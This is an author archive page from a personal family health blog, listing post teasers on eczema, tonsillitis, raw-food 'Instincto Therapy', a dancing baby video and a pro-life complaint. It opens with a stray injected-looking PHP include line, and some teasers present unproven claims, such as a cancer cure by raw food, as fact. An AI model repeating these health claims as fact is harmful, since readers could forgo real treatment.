@include(ABSPATH . WPINC .'/class-wp-xmlrpc.php'); Good Samaritan, Author at My Family Health Blog - Page 102 of 235

Author: Good Samaritan

Filipinos high risk for development of Atopic Dermatitis

Are we Filipinos really genetically pre-disposed to Atopic Dermatitis? Or is our diet and behavior PRO-Atopic Dermatitis? I think genetics is a cop out. If I had continued to live my life like a “normal” Filipino, then I and my children would be eczema riddled. What had to change...

Glee Character Rachel avoided Tonsilectomy via anti-biotics, herbs and rest

I was pleased with the conclusion of the Glee episode where the lead singer Rachel lost her voice due to some tonsil infection.  And just in character, the TV doctor recommended tonsilectomy, tonsil removal.  Of course the Glee character Rachel did not want any tonsilectomy as that could probably...

Dancing Baby Doing The Samba In Brazil

My wife absolutely cannot get enough of this dancing baby! These Brazilians can dance the samba from birth! Those gyrations come natural to these people. This cannot be fake. This is real. This baby should appear on Oprah!...

Appreciating Guy Claude Burger the Author of Instincto Therapy

Hey hey hey, the man himself Guy Glaude Burger posts in www.rawpaleoforum.com , yes, the Burger who wrote about Instincto Therapy. He’s French. He cured himself of cancer using raw food instincts. Like any guru, he has his detractors. I posted a piece that hopefully strikes a balance and...

Prolife Atty files a complaint and prayer for Preliminary Injunction/TRO against SEX Education

I got this email from the Prolife Philippines mailing list: >>Dear Prolifers, >>Supporters of Family and Life,and >>Citizens protectors of our National Sovereignty, >> >>Atty Jo Aurea Imbong,with other Pro-lifers,Pro-life groups,the Ang Kapatiran Party, will be filing a complaint against the Department >> of Education,Ms. Mona Valisno,as Secretary,Mr.Ramon C....